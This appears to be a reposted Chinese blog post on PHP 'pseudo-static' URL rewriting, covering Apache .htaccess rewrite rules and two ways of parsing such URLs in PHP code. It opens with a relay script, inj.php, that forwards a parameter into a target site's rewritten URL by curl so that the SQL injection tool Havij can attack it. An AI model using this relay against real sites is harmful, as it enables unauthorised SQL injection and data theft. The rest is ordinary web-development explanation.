PHP 伪静态技术原理以及突破原理实现介绍

最新推荐文章于 2021-07-21 22:43:47 发布
最新推荐文章于 2021-07-21 22:43:47 发布
阅读量504 收藏
点赞数
分类专栏: PHP

伪静态技术比较好突破,需要自己构造中转注入页面;伪静态技术原理都很简单,就是把原来的 index.php?id=1 这种形式的URL给替换成其它形式

先说实现方法:
inj.php:

<?php
set_time_limit(10);
$id = $_GET["id"];
$id = str_replace(" ", "%20", $id);
$id = str_replace("=", "%3D", $id);
$url = "http://www.xxx.com/index.php/library/more/id/$id.html";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "$url");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); //启用时将curl_init()获取的信息以文件流的形式返回,而不是直接输出
curl_setopt($ch, CURLOPT_HEADER, 0); //启用时会将头文件的信息作为数据流输出
$output = curl_exec($ch);
curl_close($ch);
print_r($output);
?>

用wamp搭建一个服务器,把上面inj.php放到wamp/www/中,然后在Havij中跑 http://127.0.0.1/inj.php?id=1

PHP伪静态实现方法一(利用Apache 服务器的功能)
1、检查Apache是否支持mod_rewrite
2、让Apache 支持.htaccess
3、建立.htaccess文件
4、规则:
RewriteEngine on
RewriteRule ([a-zA-Z]{1,})-([0-9]{1,}).html$index.php?action=$1&id=$2
([a-zA-Z]{1,})-([0-9]{1,}) 是 URL长啥样
$1 是([a-zA-Z]{1,}) 所匹配的
$2 是[0-9]{1,} 所匹配的
比如说:www.xx.com/page-18.html
真实的URL如下:
action = page
id = 18

PHP伪静态实现方法二(编码实现)
$Php2Html_FileUrl = $_SERVER[“REQUEST_URI”]
echo $Php2Html_FileUrl
例子:// localhost/php100/test.php?id|1@action|2

代码如下:

$Php2Html_UrlString = str_replace("?", "", str_replace("/", "", strrchr(strrchr($Php2Html_FileUrl, "/"), "?"))))
/*
内层的strrchr出来:/test.php?id|1@action|2
外层的strrchr出来:id|1@action|2
内层的str_replace出来:把 / 号去掉,本例子 没有
外层的str_replace出来:把 ?号去掉,本例子 没有
*/
$Php2Html_UrlQueryStrList = explode("@", $Php2Html_UrlString);
/*把str变成以@为界限划分的数组:id|1 和 action|2*/
foreach ($Php2Html_UrlQueryStrList as $Php2Html_UrlQueryStr) {
	$Php2Html_TmpArray = explode("|", $Php2Html_UrlQueryStr);
	/* id => 1 和 action => 2*/
	$_GET[$Php2Html_TmpArray[0]] = $Php2Html_TmpArray[1];
}

PHP伪静态实现方法三(编码实现)
例子: localhost/php100/test.php/1/2

代码如下:

$filename = basename($_SERVER["SCRIPT_NAME"]);
echo $_SERVER["SCRIPT_NAME"];
echo $filename;
if (strtolower($filename) == 'test.php') {
	if (!empty($_GET[id])) {
		$id = intval($_GET[id]);
		echo $id;
		$action = intval($_GET[action]);
		echo $action;
	} else {
		$nav = $_SERVER["REQUEST_URI"];
		$script = $_SERVER["SRCIPT_NAME"];
		//这句话应该是把URL前面那段给搞掉。。剩下 "1/2"之类的。。
		$nav = ereg_replace("$script", "", urldecode($nav));
		echo $nav;
		$vars = explode("/", $nav);
		print_r($vars);
		$id = intval($vars[1]);
		$action = intval($vars[2]);
	}
	echo $id . '&' . $action;
}

总结下:
(1)伪静态技术比较好突破,需要自己构造中转注入页面。
(2)伪静态技术原理都很简单,就是把原来的 index.php?id=1 这种形式的URL给替换成其它形式。


原文地址:http://www.xz-src.com/1951.html

源码学习分享
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
伪静态注入中转突破伪静态
07-24
伪静态注入中转突破伪静态,可以学习一下啊,比较全面了
学习札记——伪静态技术(较完整篇)
weixin_30635053的博客
06-01 126
伪静态技术产生的背景: 1、静态网页与动态比较: 1)静态网页: 优势:A、 对搜索引擎友好,被收录的质量高;B、访问速度快;C、资源(cpu 等)占用少。 劣势:A、对于大型门户,或者社区来说,不断的修改将会产生大量I/O,会导致磁盘出现碎片甚至出现磁盘坏道。相当恐怖一个隐患。用户信息一旦没有了就没戏玩了。B、储存空间占用会多一些。 2)动态网页: 优...
apeach和php合作原理,PHP 伪静态技术原理以及突破原理实现介绍
weixin_36070282的博客
03-10 145
先说实现方法:inj.php:set_time_limit(10);$id=$_GET["id"];$id=str_replace(" ","%20",$id);$id=str_replace("=","%3D",$id);$url="http://www.xxx.com/index.php/library/more/id/$id.html";$ch=curl_init();curl_setopt...
PHP 伪静态技术
u010194859的专栏
12-05 652
下面是生成伪静态地址和逆转伪静态地址的两个函数,这两个函数在相应的位置引用就可以实现将http://www.zhongya.cn/certificate_page.php?clid=22转成这样的http://www.zhongya.cn/certificate_page.php/clid_22.htm形式。 /****************************** 使用参考: 将
PHP 伪静态技术原理以及突破原理
要不,单步调试走起?
07-12 4943
先说实现方法: inj.php: <?php set_time_limit(10); $id=$_GET["id"]; $id=str_replace(" ","%20",$id); $id=str_replace("=","%3D",$id); $url="http://www.xxx.com/index.php/library/more/id/$id.html"; $ch=curl_ini
基于php伪静态实现详细介绍
10-27
通过.htaccess实现伪静态原理是通过写入重写规则(RewriteRule),告诉服务器如何将特定格式的URL转换为实际执行的脚本文件。在这个过程中,开发者可以通过正则表达式来匹配URL中特定的部分,并将其转换为查询参数...
PHP实现伪静态方法汇总
10-22
PHP伪静态技术是一种在网页URL中使用静态化的形式,但实际上仍然执行动态脚本的技术。它的主要目的是提升用户体验,因为静态的URL对于用户来说更友好,同时也有可能对搜索引擎优化(SEO)带来好处。以下是对PHP实现...
使用纯php代码实现页面伪静态的方法
12-18
为了解决这个问题,开发者通常会采用伪静态技术,即将动态页面的URL转化为看似静态的格式,从而在保持动态页面便利性的同时,提升网站的SEO效果。本文将深入讲解如何使用纯PHP代码实现页面的伪静态功能。 首先,...
PHP伪静态原理及极简实现
五侠的博客
07-21 1460
PHP伪静态原理及极简实现目的原理极简实现框架实现 目的 伪静态可以隐藏后端实现原理,便于搜索引擎收藏,开起来高大上一些。 原理 通过nginx路径重写跳转到后端,再分发到控制器。 极简实现 为了简单,以nginx和php-fpm的方式部署项目,网站根目录就两个文件: helpers.php,其中存放各种函数 index.php,用于提取路由并分发到函数中 适合功能非常简单,没必要使用框架的情况。 第一步:配置nginx location / { try_files $uri $uri/ /inde
伪静态注入中转
10-06
伪静态注入中转PHP版本 土司出品 方便大家测试使用
php伪静态原理,Discuz!伪静态原理分析
weixin_39768247的博客
03-11 264
伪静态在SEO火热的时代,是每个站长都比较关注的问题,Discuz!论坛如何伪静态,为什么伪静态失效了,为什么列表页无法实现伪静态,为什么有些页面不是伪静态呢?下面dz官方nxy105从两个角度入手为大家分析下discuz!X2是如何实现伪静态功能。第一、Discuz!伪静态是如何作用的我们都知道,当我们通过地址访问一个页面的时候,访问的是服务器上的一个实体文件。例如,访问http://www....
php实现伪静态以及定义原理
Sunsaisai的博客
11-30 3268
伪静态是什么:网站分为动态网站和静态网站,我们常见的以html结尾的一般都是静态页面,以.php.asp结尾的页面一般是动态网站,动态网站是有和数据库进行交互才被称为动态网站,动态网站由于不容易被搜索引擎搜录所以才有了伪静态这么一说,伪静态顾名思义就是假的静态网站,也就是说动态网站为了方便被搜索引擎收录,利用服务器的rewirte实现的假静态的过程。 首先说明一下伪静态的好处好不足之处, 好处...
php 伪静态页面的实现
堆码,堆出一片天
04-06 1053
所谓伪静态页面指得是 http://host/index.php/module/sub/action/1.html 类似于这样的url生成的页面。使用伪静态页面的好处就是网站的页面可以被搜索引擎的爬虫更快的抓取。php 使用伪静态页面的关键就是对 $_SERVER[PATH_INFO] 变量的分析,对于 http://host/index.php/module/sub/action/1.htm
php怎么伪静态页面,php怎么实现网页伪静态
weixin_32126033的博客
04-11 363
php实现网页伪静态的方法:首先在服务器根目录创建一个“.htaccess”文件;然后添加内容为“RewriteRule ^index-(\d+)\.html$ index.php?id=$1”即可。本文操作环境:Windows7系统、PHP7.1版,DELL G3电脑.htaccess实现php网站伪静态,百分百可用!伪静态是啥?很简单,就是假的静态网页...例如有个网页是:www.xxx.co...
伪静态技术
aaa333qwe的博客
05-08 639
http://bbs.itcast.cn/thread-82858-1-1.html?xhw一、何为“伪静态”?       以传智播客bbs论坛为例,这篇帖子的链接地址原本应该是“http://bbs.itcast.cn/forum.php?mod=post&amp;action=newthread&amp;fid=181”,拼接好多参数,是不是看了之后“头疼”?不仅不好看,从seo的角度考虑,...
伪静态及其原理实现
gscaiyucheng的专栏
12-26 2658
伪静态是相对真实静态来讲的,通常我们为了增强搜索引擎的友好面,都将文章内容生成静态页面,但是有的朋友为了实时的显示一些信息。或者还想运用动态脚本解决一些问题。不能用静态的方式来展示网站内容。但是这就损失了对搜索引擎的友好面。怎么样在两者之间找个中间方法呢,这就产生了伪静态技术。  伪静态的生成的2种方式:   1,框架型伪静态,这种是非常简单而且也是非常便于识别的,它的原理比较简单,就是做
Discuz!伪静态原理分析
sb___itfk的专栏
03-11 891
第一、Discuz!伪静态是如何作用的 我们都知道,当我们通过地址访问一个页面的时候,访问的是服务器上的一个实体文件。例如,访问 http://www.xxx.com/index.html,访问的是网站根目录下的index.html文件。然而,对于论坛,如果每一个页面(主题列表,内容页)都是一个静态的实体文件,那文件的数量将何其之多,并且不能动态的实 时的展现论坛的内容。如果仅仅使用动态访问
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值